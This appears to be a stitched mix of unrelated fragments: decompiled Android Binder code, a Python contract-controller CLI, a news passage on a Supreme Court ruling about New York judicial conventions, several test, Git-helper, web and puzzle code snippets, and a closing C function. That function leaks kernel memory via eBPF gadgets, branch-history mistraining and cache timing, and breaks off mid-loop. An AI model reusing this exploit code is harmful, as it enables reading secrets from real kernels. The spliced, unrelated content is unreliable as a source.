parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); parcel2.writeNoException(); return true; case C0861R.styleable.AppCompatTheme_listDividerAlertDialog /*45*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); parcel2.writeNoException(); return true; case C0861R.styleable.AppCompatTheme_actionDropDownStyle /*46*/: zzj com_google_android_gms_common_internal_zzj; parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); a = C1331a.m4721a(parcel.readStrongBinder()); if (parcel.readInt() != 0) { com_google_android_gms_common_internal_zzj = (zzj) zzj.CREATOR.createFromParcel(parcel); } m4859a(a, com_google_android_gms_common_internal_zzj); parcel2.writeNoException(); return true; case C0861R.styleable.AppCompatTheme_dropdownListPreferredItemHeight /*47*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); a = C1331a.m4721a(parcel.readStrongBinder()); if (parcel.readInt() != 0) { com_google_android_gms_common_internal_zzan = (zzan) zzan.CREATOR.createFromParcel(parcel); } m4858a(a, com_google_android_gms_common_internal_zzan); parcel2.writeNoException(); return true; case 1598968902: parcel2.writeString("com.google.android.gms.common.internal.IGmsServiceBroker"); return true; default: return super.onTransact(i, parcel, parcel2, i2); } } } void m4858a(C1330w c1330w, zzan com_google_android_gms_common_internal_zzan); void m4859a(C1330w c1330w, zzj com_google_android_gms_common_internal_zzj); }
#![feature(int_error_matching)]

mod syntax;

pub mod client;
pub mod header;
pub mod method;
pub mod protocol;
pub mod reason;
pub mod request;
pub mod response;
pub mod server;
pub mod session;
pub mod status;
pub mod uri;

pub use rtsp_common::version;
# Copyright 2018 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import os, sys
import logging
import argparse
import copy
import cmd
import shlex
import time
import random
import re

from string import Template

logger = logging.getLogger(__name__)

__all__ = ['ContractController']

from pdo.client.controller.commands import *
from pdo.common.utility import find_file_in_path

# XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
# XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
class State(object) :
    """
    """

    # --------------------------------------------------
    def __init__(self, config) :
        self.__data__ = copy.deepcopy(config)

    # --------------------------------------------------
    def set(self, keylist, value) :
        assert keylist

        current = self.__data__
        for key in keylist[:-1] :
            if key not in current :
                current[key] = {}
            current = current[key]

        current[keylist[-1]] = value

    # --------------------------------------------------
    def get(self, keylist, value=None) :
        assert keylist

        current = self.__data__
        for key in keylist :
            if key not in current :
                return value
            current = current[key]

        return current

# XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
# XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
class Bindings(object) :
    """
    """

    # --------------------------------------------------
    def __init__(self, bindings = {}) :
        self.__bindings__ = copy.copy(bindings)

    # --------------------------------------------------
    def bind(self, variable, value) :
        self.__bindings__[variable] = value

    # --------------------------------------------------
    def isbound(self, variable) :
        return variable in self.__bindings__

    # --------------------------------------------------
    def expand(self, argstring) :
        try :
            template = Template(argstring)
            return template.substitute(self.__bindings__)
        except KeyError as ke :
            print('missing index variable {0}'.format(ke))
            return '-h'

# XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
# CLASS: ContractController
# XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
class ContractController(cmd.Cmd) :
    """
    ContractController -- base class for building contract controllers

    Class defines the following variables:
    """

    # -----------------------------------------------------------------
    @staticmethod
    def ProcessScript(controller, filename, echo=False) :
        """
        ProcessScript -- process a file containing commands for the controller
        """
        saved = controller.echo
        try :
            controller.echo = echo
            cmdlines = ContractController.ParseScriptFile(filename)
            for cmdline in cmdlines :
                if controller.onecmd(cmdline) :
                    return False
        except Exception as e :
            controller.echo = saved
            raise e

        controller.echo = saved
        return True

    # -----------------------------------------------------------------
    @staticmethod
    def ParseScriptFile(filename) :
        cpattern = re.compile('##.*$')

        with open(filename) as fp :
            lines = fp.readlines()

        cmdlines = []
        for line in lines :
            line = re.sub(cpattern, '', line.strip())
            if len(line) > 0 :
                cmdlines.append(line)

        return cmdlines

    # -----------------------------------------------------------------
    def __init__(self, config) :
        cmd.Cmd.__init__(self)

        self.echo = False
        self.bindings = Bindings(config.get('Bindings',{}))
        self.state = State(config)

        name = self.state.get(['Client', 'Identity'], "")
        self.prompt = "{0}> ".format(name)

    # -----------------------------------------------------------------
    def precmd(self, line) :
        if self.echo:
            print(line)
        return line

    # -----------------------------------------------------------------
    def postcmd(self, flag, line) :
        return flag

    # =================================================================
    # STOCK COMMANDS
    # =================================================================

    # -----------------------------------------------------------------
    def do_sleep(self, args) :
        """
        sleep <seconds> -- command to pause processing for a time (seconds).
        """
        pargs = shlex.split(self.bindings.expand(args))
        if len(pargs) == 0 :
            print('Time to sleep required: sleep <seconds>')
            return

        try :
            tm = int(pargs[0])
            print("Sleeping for {} seconds".format(tm))
            time.sleep(tm)
        except SystemExit as se :
            if se.code > 0 :
                print('An error occurred processing {0}: {1}'.format(args, str(se)))
            return
        except Exception as e :
            print('An error occurred processing {0}: {1}'.format(args, str(e)))
            return

    # -----------------------------------------------------------------
    def do_set(self, args) :
        """
        set -- assign a value to a symbol that can be retrieved with a $expansion
        """
        pargs = shlex.split(self.bindings.expand(args))

        try :
            parser = argparse.ArgumentParser(prog='set')
            parser.add_argument('-q', '--quiet', help='suppress printing the result', action='store_true')
            parser.add_argument('-s', '--symbol', help='symbol in which to store the identifier', required=True)
            parser.add_argument('-c', '--conditional', help='set the value only if it is undefined', action='store_true')
            eparser = parser.add_mutually_exclusive_group(required=True)
            eparser.add_argument('-i', '--identity', help='identity to use for retrieving public keys')
            eparser.add_argument('-f', '--file', help='name of the file to read for the value')
            eparser.add_argument('-v', '--value', help='string value to associate with the symbol')
            options = parser.parse_args(pargs)

            if options.conditional and self.bindings.isbound(options.symbol) :
                return

            value = options.value
            if options.identity :
                keypath = self.state.get(['Key', 'SearchPath'])
                keyfile = find_file_in_path("{0}_public.pem".format(options.identity), keypath)
                with open (keyfile, "r") as myfile:
                    value = myfile.read()
            if options.file :
                with open (options.file, "r") as myfile:
                    value = myfile.read()

            self.bindings.bind(options.symbol,value)
            if not options.quiet :
                print("${} = {}".format(options.symbol, value))
            return
        except SystemExit as se :
            if se.code > 0 :
                print('An error occurred processing {0}: {1}'.format(args, str(se)))
            return
        except Exception as e :
            print('An error occurred processing {0}: {1}'.format(args, str(e)))
            return

    # -----------------------------------------------------------------
    def do_echo(self, args) :
        """
        echo -- expand local $symbols
        """
        print(self.bindings.expand(args))

    # -----------------------------------------------------------------
    def do_identity(self, args) :
        """
        identity -- set the identity and keys to use for transactions
        """
        pargs = shlex.split(self.bindings.expand(args))

        try :
            parser = argparse.ArgumentParser(prog='identity')
            parser.add_argument('-n', '--name', help='identity to use for transactions', type=str, required=True)
            parser.add_argument('-f', '--key-file', help='file that contains the private key used for signing', type=str)
            options = parser.parse_args(pargs)

            self.prompt = "{0}> ".format(options.name)
            self.state.set(['Client', 'Identity'], options.name)
            self.state.set(['Key', 'FileName'], "{0}_private.pem".format(options.name))

            if options.key_file :
                self.state.set(['Key', 'FileName'], options.key_file)

            return
        except SystemExit as se :
            if se.code > 0 :
                print('An error occurred processing {0}: {1}'.format(args, str(se)))
            return
        except Exception as e :
            print('An error occurred processing {0}: {1}'.format(args, str(e)))
            return

    # -----------------------------------------------------------------
    def do_load_plugin(self, args) :
        """
        load -- load a new command processor from a file, the file should define a
        function called load_commands
        """
        pargs = shlex.split(self.bindings.expand(args))

        try :
            parser = argparse.ArgumentParser(prog='load_plugin')
            group = parser.add_mutually_exclusive_group(required=True)
            group.add_argument('-c', '--contract-class', help='load contract plugin from data directory', type=str)
            group.add_argument('-f', '--file', help='file from which to read the plugin', type=str)
            options = parser.parse_args(pargs)

            if options.file :
                plugin_file = options.file

            if options.contract_class :
                contract_paths = self.state.get(['Contract', 'SourceSearchPath'], ['.'])
                plugin_file = find_file_in_path(options.contract_class + '.py', contract_paths)

            with open(plugin_file) as f:
                code = compile(f.read(), plugin_file, 'exec')
                exec(code, globals())

            load_commands(ContractController)
            return
        except SystemExit as se :
            if se.code > 0 :
                print('An error occurred processing {0}: {1}'.format(args, str(se)))
            return
        except Exception as e :
            print('An error occurred processing {0}: {1}'.format(args, str(e)))
            return

    # -----------------------------------------------------------------
    def do_script(self, args) :
        """
        script -- load commands from a file
        """
        pargs = shlex.split(self.bindings.expand(args))

        try :
            parser = argparse.ArgumentParser(prog='script')
            parser.add_argument('-f', '--file', help='file from which to read commands', required=True)
            parser.add_argument('-e', '--echo', help='turn on command echoing', action='store_true')
            options = parser.parse_args(pargs)

            ContractController.ProcessScript(self, options.file, options.echo)
            return
        except SystemExit as se :
            if se.code > 0 :
                print('An error occurred processing {0}: {1}'.format(args, str(se)))
            return
        except Exception as e :
            print('An error occurred processing {0}: {1}'.format(args, str(e)))
            return

    # =================================================================
    # CONTRACT COMMANDS
    # =================================================================

    # -----------------------------------------------------------------
    def do_pservice(self, args) :
        """
        pservice -- manage provisioning service list
        """
        pargs = shlex.split(self.bindings.expand(args))

        try :
            pservice(self.state, self.bindings, pargs)
        except SystemExit as se :
            if se.code > 0 :
                print('An error occurred processing {0}: {1}'.format(args, str(se)))
            return
        except Exception as e :
            print('An error occurred processing {0}: {1}'.format(args, str(e)))
            return

    # -----------------------------------------------------------------
    def do_eservice(self, args) :
        """
        eservice -- manage enclave service list
        """
        pargs = shlex.split(self.bindings.expand(args))

        try :
            eservice(self.state, self.bindings, pargs)
        except SystemExit as se :
            if se.code > 0 :
                print('An error occurred processing {0}: {1}'.format(args, str(se)))
            return
        except Exception as e :
            print('An error occurred processing {0}: {1}'.format(args, str(e)))
            return

    # -----------------------------------------------------------------
    def do_contract(self, args) :
        """
        contract -- load contract for use
        """
        pargs = shlex.split(self.bindings.expand(args))

        try :
            contract(self.state, self.bindings, pargs)
        except SystemExit as se :
            if se.code > 0 :
                print('An error occurred processing {0}: {1}'.format(args, str(se)))
            return
        except Exception as e :
            print('An error occurred processing {0}: {1}'.format(args, str(e)))
            return

    # -----------------------------------------------------------------
    def do_create(self, args) :
        """
        create -- create a contract
        """
        pargs = shlex.split(self.bindings.expand(args))

        try :
            create(self.state, self.bindings, pargs)
        except SystemExit as se :
            if se.code > 0 :
                print('An error occurred processing {0}: {1}'.format(args, str(se)))
            return
        except Exception as e :
            print('An error occurred processing {0}: {1}'.format(args, str(e)))
            return

    # -----------------------------------------------------------------
    def do_send(self, args) :
        """
        send -- send a message to the contract
        """
        pargs = shlex.split(self.bindings.expand(args))

        try :
            send(self.state, self.bindings, pargs)
        except SystemExit as se :
            if se.code > 0 :
                print('An error occurred processing {0}: {1}'.format(args, str(se)))
            return
        except Exception as e :
            print('An error occurred processing {0}: {1}'.format(args, str(e)))
            return

    # -----------------------------------------------------------------
    def do_get_public_key(self, args) :
        """
        get_public_key -- get the public key from the current contract
        """
        pargs = shlex.split(self.bindings.expand(args))

        try :
            GetPublicKey.GetPublicKey(self, pargs)
        except SystemExit as se :
            if se.code > 0 :
                print('An error occurred processing {0}: {1}'.format(args, str(se)))
            return
        except Exception as e :
            print('An error occurred processing {0}: {1}'.format(args, str(e)))
            return

    # XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    # XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

    # -----------------------------------------------------------------
    def do_exit(self, args) :
        """
        exit -- shutdown the simulator and exit the command loop
        """
        return True

    # -----------------------------------------------------------------
    def do_EOF(self, args) :
        """
        exit -- shutdown the simulator and exit the command loop
        """
        return True
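Every `do_*` command above first runs its argument string through `Bindings.expand`, which uses `string.Template` to substitute `$symbol` references before `shlex` splits the line. A minimal standalone sketch of that expansion step (the function name here is illustrative):

```python
from string import Template


def expand(argstring: str, bindings: dict) -> str:
    """Substitute $symbol references in a command line from a binding table.

    Mirrors Bindings.expand above: an unbound symbol is reported and '-h'
    is returned, so the downstream argparse call prints usage and aborts
    instead of running the command with a half-expanded line.
    """
    try:
        return Template(argstring).substitute(bindings)
    except KeyError as ke:
        print('missing index variable {0}'.format(ke))
        return '-h'
```

Returning `-h` on a missing binding is a deliberate design choice: it reuses the parser's own help path as the error handler rather than introducing a separate failure channel.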
The lower court rulings that were voided by the justices on Wednesday had barred the New York State Board of Elections from using the judicial convention system, directing the board to hold primaries instead, until the State Legislature could set up a new selection system.

The high court’s rejection of those decrees was not a surprise, given that when the case was argued last Oct. 3, several justices voiced skepticism of the lower courts’ conclusions.

The lower courts had ruled that picking State Supreme Court nominees by party convention violated the First Amendment right of political association by excluding not only the voters but also judicial candidates who are not anointed by party elders from the process. The high court found instead that the Constitution cut the other way, in favor of the state system.

“A political party has a First Amendment right to limit its membership as it wishes and to choose a candidate-selection process that will in its view produce the nominee who best represents its political platform,” Justice Scalia wrote.

He noted that nothing prevents people with judicial aspirations from wooing party leaders. Nor does anything compel the delegates chosen in party primaries in each assembly district to vote the way the party leaders desire, although they almost always do. Judicial aspirants are free to try to persuade the delegates to vote for them. And if they cannot persuade the delegates, they are free to try to gather the necessary signatures (generally several thousand, depending on the district) to get their names on the ballots despite the lack of party backing, Justice Scalia noted.

“Selection by convention has been a traditional means of choosing party nominees,” Justice Scalia wrote. “While a state may determine it is not desirable and replace it, it is not unconstitutional.”

Theodore B. Olson, the lawyer for the New York State Board of Elections who argued in favor of the convention system before the justices, told them the state had adopted the convention system decades ago, after experience with party primaries “spawned unseemly, expensive, and potentially corrupting fund-raising by judicial candidates.”

Justice Scalia and the other members of the high court were not persuaded by arguments that “one-party rule” effectively denied some people “a fair shot” at a judicial nomination.

“The reason one-party rule is entrenched may be (and usually is) that voters approve of the positions and candidates that the party regularly puts forward,” Justice Scalia wrote.

Andrew Rossman, a New York City lawyer who argued the case on behalf of the Democratic Party with Mr. Olson, called the ruling “a victory for the judiciary of New York” and said it would foster “a better and more independent judiciary.”

But Frederick A. O. Schwarz Jr., who defended the lower courts’ findings before the justices, said that since the present system began in 1921, “New York has compiled an 87-year record of anti-democratic exclusion, unaccountability and corruption in judicial selection.” Mr. Schwarz said he still hoped for legislation that would end the convention method.

Judge Torres herself said it was clear that, despite the outcome, “the Supreme Court’s decision should not, by any means, be read as endorsing New York’s flawed system.”

The suit that led to Wednesday’s ruling was begun in 2004, following scandals in Brooklyn, where allegations of bribery, corruption and cronyism cast an unflattering spotlight on the way judges are picked. On Jan. 27, 2006, Federal Judge John Gleeson of Brooklyn declared the selection system “opaque and undemocratic” and said it violated the rights of voters.

Justice Anthony M. Kennedy, joined by Justice Stephen G.
Breyer, wrote separately to express the hope that better ways of picking jurists will evolve, and to emphasize their concern over the shabby clubhouse practices that sometimes accompany the process now. “Even in flawed election systems, there emerge brave and honorable judges who exemplify the law’s ideals,” Justice Kennedy wrote. “But it is unfair to them and to the concept of judicial independence if the state is indifferent to a selection process open to manipulation, criticism and serious abuse.” And Justice John Paul Stevens, joined by Justice David H. Souter, wrote that there was a distinction “between constitutionality and wise policy,” and that they did not necessarily disagree with the lower courts’ findings of “glaring deficiencies” in the present system, despite its embrace by state lawmakers. But, Justice Stevens concluded, “as I recall my esteemed former colleague, Thurgood Marshall, remarking on numerous occasions: ‘The Constitution does not prohibit legislatures from enacting stupid laws.’ ”
/**
 * Tests for passing parameters to test methods.
 *
 * @author Cedric Beust, Jul 22, 2004
 */
public class ParameterTest extends BaseTest {

//  @Configuration(beforeTestMethod = true)
//  public void methodSetUp() {
//    m_testRunner.setClasses(new Class[] { test.ParameterTest.class });
//  }

  public static void ppp(String s) {
    System.out.println("[ParameterTest] " + s);
  }

  @Test
  public void stringSingle() {
    addClass("test.parameters.ParameterSample");
    setParameter("first-name", "Cedric");
    addIncludedGroup("singleString");
    run();
    String[] passed = {
        "testSingleString", "testSingleStringDeprecated",
    };
    String[] failed = {};
    verifyTests("Passed", passed, getPassedTests());
    verifyTests("Failed", failed, getFailedTests());
  }
}
import log from 'electron-log';

import { Topic } from '@shared/constants/topic';
import { getStore } from '@shared/store';

import type { LogData } from '@shared/types';
import type { MatchResult } from './utils';

const store = getStore();

/**
 * Broadcasts the cleaned-up log entries to the outside world.
 * @param type
 * @param source
 */
export function logManager(
  type: 'box' | 'state',
  source: MatchResult[] | null
) {
  if (source && source.length) {
    source.forEach((item) => {
      const result = item.feature?.getResult?.(item.line);
      const data: LogData = {
        type,
        date: item.date,
        state: item.state,
        original: item.line?.original,
        result,
      };
      log.info(data);
      store.dispatch<Topic.FLOW>({
        type: Topic.FLOW,
        payload: data,
      });
    });
  }
}
package org.herry.pic.helper;

import java.io.File;
import java.io.IOException;
import java.util.Set;

import org.eclipse.jgit.api.AddCommand;
import org.eclipse.jgit.api.Git;
import org.eclipse.jgit.api.RmCommand;
import org.eclipse.jgit.api.Status;
import org.eclipse.jgit.api.errors.GitAPIException;
import org.eclipse.jgit.internal.storage.file.FileRepository;
import org.eclipse.jgit.transport.UsernamePasswordCredentialsProvider;

/**
 * @author zhangheng
 * @date 2020/4/5 11:05
 */
public class GgitOperate {

    // Local git working directory
    public static final String LOCALPATH = "D:/git_home/demo/";
    // Path to the .git directory
    public static final String LOCALGITFILE = LOCALPATH + ".git";
    // Remote repository URL
    public static final String REMOTEREPOURI = "https://gitee.com/zhanghenry007/md-pic.git";
    // Username for git operations
    public static final String USER = "<EMAIL>";
    // Password
    public static final String PASSWORD = "***";

    // Establish the connection to the remote repository; only needs to run once
    public static String setupRepo() {
        String msg = "";
        try {
            Git git = Git.cloneRepository()
                    .setURI(REMOTEREPOURI)
                    .setCredentialsProvider(new UsernamePasswordCredentialsProvider(USER, PASSWORD))
                    .setBranch("master")
                    .setDirectory(new File(LOCALPATH)).call();
            msg = "git init success!";
        } catch (Exception e) {
            msg = "git already initialized!";
        }
        return msg;
    }

    // Pull files from the remote repository
    public static boolean pullBranchToLocal() {
        boolean resultFlag = false;
        // git repository handle
        Git git;
        try {
            git = new Git(new FileRepository(LOCALGITFILE));
            git.pull().setRemoteBranchName("master")
                    .setCredentialsProvider(new UsernamePasswordCredentialsProvider(USER, PASSWORD)).call();
            resultFlag = true;
        } catch (IOException | GitAPIException e) {
            e.printStackTrace();
        }
        return resultFlag;
    }

    // Commit and push to git
    public static boolean commitFiles() {
        Git git = null;
        try {
            git = Git.open(new File(LOCALGITFILE));
            AddCommand addCommand = git.add();
            // add operation; how to do "add -A" with JGit was not worked out here,
            // see the JGit API if interested
            addCommand.addFilepattern(".").call();
            RmCommand rm = git.rm();
            Status status = git.status().call();
            // Loop over "missing" files; the difference between missing and removed is
            // unclear, but deleted files also have to be committed to git
            Set<String> missing = status.getMissing();
            for (String m : missing) {
                // logger.info("missing files: " + m);
                rm.addFilepattern(m).call();
                // rm and status must be re-acquired each time, otherwise an error is thrown
                rm = git.rm();
                status = git.status().call();
            }
            // Loop over "removed" files
            Set<String> removed = status.getRemoved();
            for (String r : removed) {
                // logger.info("removed files: " + r);
                rm.addFilepattern(r).call();
                rm = git.rm();
                status = git.status().call();
            }
            // Commit
            git.commit().setMessage("commit").call();
            // Push
            git.push().setCredentialsProvider(new UsernamePasswordCredentialsProvider(USER, PASSWORD)).call();
            return true;
        } catch (Exception e) {
            e.printStackTrace();
            return false;
        }
    }

    /**
     * @author zhang.heng
     * @date 2020-04-07 18:00
     * @Param: [localPath, remoteRepoUri, userName, userPassword]
     * @return java.lang.String
     * @throws
     * @taskId
     */
    public static String setupRepo(String localPath, String remoteRepoUri, String userName, String userPassword) {
        String msg = "";
        try {
            Git git = Git.cloneRepository()
                    .setURI(remoteRepoUri)
                    .setCredentialsProvider(new UsernamePasswordCredentialsProvider(userName, userPassword))
                    .setBranch("master")
                    .setDirectory(new File(localPath)).call();
            msg = "git init success!";
        } catch (Exception e) {
            msg = "git already initialized!";
        }
        return msg;
    }

    // Pull files from the remote repository
    public static boolean pullBranchToLocal(String localGitFile, String userName, String userPassword) {
        boolean resultFlag = false;
        // git repository handle
        Git git;
        try {
            git = new Git(new FileRepository(localGitFile));
            git.pull().setRemoteBranchName("master")
                    .setCredentialsProvider(new UsernamePasswordCredentialsProvider(userName, userPassword)).call();
            resultFlag = true;
        } catch (IOException | GitAPIException e) {
            e.printStackTrace();
        }
        return resultFlag;
    }

    // Commit and push to git
    public static boolean commitFiles(String localGitFile, String userName, String userPassword) {
        Git git = null;
        try {
            git = Git.open(new File(localGitFile));
            AddCommand addCommand = git.add();
            // add operation; how to do "add -A" with JGit was not worked out here,
            // see the JGit API if interested
            addCommand.addFilepattern(".").call();
            RmCommand rm = git.rm();
            Status status = git.status().call();
            // Loop over "missing" files; deleted files also have to be committed to git
            Set<String> missing = status.getMissing();
            for (String m : missing) {
                // logger.info("missing files: " + m);
                rm.addFilepattern(m).call();
                // rm and status must be re-acquired each time, otherwise an error is thrown
                rm = git.rm();
                status = git.status().call();
            }
            // Loop over "removed" files
            Set<String> removed = status.getRemoved();
            for (String r : removed) {
                // logger.info("removed files: " + r);
                rm.addFilepattern(r).call();
                rm = git.rm();
                status = git.status().call();
            }
            // Commit
            git.commit().setMessage("commit").call();
            // Push
            git.push().setCredentialsProvider(new UsernamePasswordCredentialsProvider(userName, userPassword)).call();
            return true;
        } catch (Exception e) {
            e.printStackTrace();
            return false;
        }
    }
}
import { authorizePath, callbackPath } from './constants';

export function getAuthorizePath(id?: string) {
  return authorizePath + '/' + (id || ':id?');
}

export function getCallbackPath(id?: string) {
  return callbackPath + (id ? '/' + id : '');
}
import { Component, AfterContentInit } from '@angular/core';
import { ActivatedRoute } from '@angular/router';

import blog from '../../../../data/blog/blog.json';
import blogcategory from '../../../../data/blog/category.json';
import blogtags from '../../../../data/blog/tags.json';
import author from '../../../../data/speaker.json';

@Component({
  selector: 'app-content',
  templateUrl: './content.component.html',
  styleUrls: ['./content.component.css']
})
export class ContentComponent implements AfterContentInit {

  // pagination
  page: number = 1;

  constructor(private router: ActivatedRoute) { }

  public blogpost = blog;
  public author = author;
  public blogtags = blogtags;
  public blogcategory = blogcategory;

  public getAuthor(items: string | any[]) {
    var elems = author.filter((item: { id: string; }) => {
      return items.includes(item.id);
    });
    return elems;
  }

  // Category Filter
  public setCategory(id: any) {
    this.blogcategory = id;
  }

  public getCategory() {
    return this.blogcategory;
  }

  public getPostsByCategory(catId: string) {
    return this.blogpost = blog.filter((item: { category: number[]; }) => {
      return item.category.includes(parseInt(catId));
    });
  }

  // Tag Filter
  public setTag(id: any) {
    this.blogtags = id;
  }

  public getTag() {
    return this.blogtags;
  }

  public getPostsByTags(tagId: string) {
    return this.blogpost = blog.filter((item: { tags: number[]; }) => {
      return item.tags.includes(parseInt(tagId));
    });
  }

  // Author Filter
  public setAuthor(id: any) {
    this.author = id;
  }

  public getAuthorPost() {
    return this.author;
  }

  public getPostsByAuthors(authorId: string) {
    return this.blogpost = blog.filter((item: { author: number[]; }) => {
      return item.author.includes(parseInt(authorId));
    });
  }

  // Apply all filters. The original `!= '' || != undefined || != null` chains were
  // always true, so each check is reduced to a simple truthiness test.
  public setPosts() {
    var postsByCategory = this.getCategory() != undefined ? this.getPostsByCategory(this.getCategory()) : '',
        postsByTags = this.getTag() != undefined ? this.getPostsByTags(this.getTag()) : '',
        postsByAuthor = this.getAuthorPost() != undefined ? this.getPostsByAuthors(this.getAuthorPost()) : '';
    if (postsByCategory && postsByCategory.length > 0) {
      this.blogpost = postsByCategory;
    } else if (postsByTags && postsByTags.length > 0) {
      this.blogpost = postsByTags;
    } else if (postsByAuthor && postsByAuthor.length > 0) {
      this.blogpost = postsByAuthor;
    }
  }

  ngAfterContentInit(): void {
    this.setCategory(this.router.snapshot.params.catId);
    this.setTag(this.router.snapshot.params.tagId);
    this.setAuthor(this.router.snapshot.params.authorId);
    this.setPosts();
  }
}
def get_input():
    while True:
        try:
            yield ''.join(input())
        except EOFError:
            break

# ans_k[n] = number of ways to write n as an ordered sum of k integers in [0, 1000],
# built up by repeatedly convolving with the indicator of [0, 1000]
ans1 = [0 for i in range(4001)]
ans2 = [0 for i in range(4001)]
ans3 = [0 for i in range(4001)]
ans4 = [0 for i in range(4001)]

for i in range(1001):
    ans1[i] = 1
for i in range(1001, 4001):
    ans1[i] = 0

# negative indices wrap around to the trailing zeros of the table,
# so out-of-range terms contribute 0
for i in range(4001):
    for j in range(1001):
        ans2[i] += ans1[i - j]
for i in range(4001):
    for j in range(1001):
        ans3[i] += ans2[i - j]
for i in range(4001):
    for j in range(1001):
        ans4[i] += ans3[i - j]

# print("DONE")
N = list(get_input())
for l in range(len(N)):
    print(ans4[int(N[l])])
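The repeated-convolution idea above generalizes to any bound. As a sanity check (an assumption of this note, not part of the original program), the same construction with a bound of 5 can be compared against a brute-force count over all ordered 4-tuples:

```python
from itertools import product

def ways_by_convolution(n_max, bound, k=4):
    """Count ordered sums of k integers in [0, bound] via repeated convolution."""
    ans = [1 if i <= bound else 0 for i in range(n_max + 1)]  # k = 1 case
    for _ in range(k - 1):
        nxt = [0] * (n_max + 1)
        for i in range(n_max + 1):
            for j in range(0, min(bound, i) + 1):
                nxt[i] += ans[i - j]
        ans = nxt
    return ans

def ways_brute_force(n, bound, k=4):
    # Enumerate every ordered k-tuple and count those summing to n
    return sum(1 for t in product(range(bound + 1), repeat=k) if sum(t) == n)

table = ways_by_convolution(20, 5)
assert all(table[n] == ways_brute_force(n, 5) for n in range(21))
```

The original program is the `bound = 1000`, `n_max = 4000` instance of this, with the convolution unrolled into four explicit tables.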
/**
 * Group of tests for EnsemblGenomes compara databases
 *
 * @author dstaines
 */
public class EGCompara extends GroupOfTests {

    public EGCompara() {
        setDescription("Group of tests for EnsemblGenomes compara databases.");
        addTest(
            EGCommon.class,
            EGComparaGeneTree.class,
            EGCheckSynteny.class,
            EGForeignKeyMethodLinkSpeciesSetId.class,
            EGCheckNoTreeStableIds.class,
            ForeignKeyDnafragId.class,
            ForeignKeyGenomeDbId.class,
            ForeignKeyGenomicAlignBlockId.class,
            ForeignKeyGenomicAlignId.class,
            ForeignKeyMethodLinkId.class,
            ForeignKeyTaxonId.class,
            EGCheckEmptyLocators.class,
            MemberXrefAssociation.class,
            MemberProductionCounts.class,
            MultipleGenomicAlignBlockIds.class,
            ControlledComparaTables.class
        );
    }
}
package makeless_go_model

import "sync"

type EmailVerification struct {
	Model
	Token    *string `gorm:"unique;not null" json:"-"`
	Verified *bool   `gorm:"not null" json:"verified"`
	UserId   *uint   `gorm:"not null" json:"userId"`
	User     *User   `json:"user"`
	*sync.RWMutex
}

func (emailVerification *EmailVerification) GetId() uint {
	emailVerification.RLock()
	defer emailVerification.RUnlock()
	return emailVerification.Id
}

func (emailVerification *EmailVerification) GetToken() *string {
	emailVerification.RLock()
	defer emailVerification.RUnlock()
	return emailVerification.Token
}

func (emailVerification *EmailVerification) GetVerified() *bool {
	emailVerification.RLock()
	defer emailVerification.RUnlock()
	return emailVerification.Verified
}

func (emailVerification *EmailVerification) GetUser() *User {
	emailVerification.RLock()
	defer emailVerification.RUnlock()
	return emailVerification.User
}
import sys
input = sys.stdin.readline

def gcd(a, b):
    if a == 0:
        return b
    return gcd(b % a, a)

def lcm(a, b):
    return (a * b) / gcd(a, b)

def isprime(n):
    for i in range(2, int(n ** 0.5) + 1):
        if n % i == 0:
            return 0
    return 1

def main():
    n = int(input())
    s = input()
    d = {}
    d['a'] = d['e'] = d['i'] = d['o'] = d['u'] = d['y'] = 0
    i = 0
    while i < n:
        if s[i] in d.keys():
            c = 1
            while i + 1 < n and s[i] == s[i + 1]:
                i += 1
                c += 1
            # print(c)
            if s[i] == 'e' or s[i] == 'o':
                if c > 2:
                    print(s[i], end='')
                else:
                    print(s[i] * c, end='')
            else:
                print(s[i], end='')
        else:
            print(s[i], end='')
        i += 1

if __name__ == "__main__":
    main()
// Leak the byte at the provided kernel addr; returns 0 if addr is not mapped.
// If provided, n_hits also returns the number of hits, to check the
// confidence level of the leak.
int leak(uint64_t addr, int *n_hits)
{
    int hits;
    uint8_t byte = 0;
    *n_hits = 0;
    for (int bit_pos = 0; bit_pos < 8; bit_pos++) {
        hits = 0;
        for (int j = 0; j < ITER; j++) {
            if (evict_syscall) {
                evict(&ev_set_sys);
            }
            evict_fr_buf();
            trigger_ebpf(sock_gadget_leak, 0);
            fill_bhb(history, SYSCALL_MISTRAIN, bit_pos, 0, 0, addr - 0x14ULL);
            trigger_ebpf(sock_reload, 0);
            if (map_get(map_array_fd_time, 1) < thr_fr_buf)
                hits++;
        }
        // Majority vote over ITER trials decides the bit
        if (hits > ITER / 2)
            byte |= (1 << bit_pos);
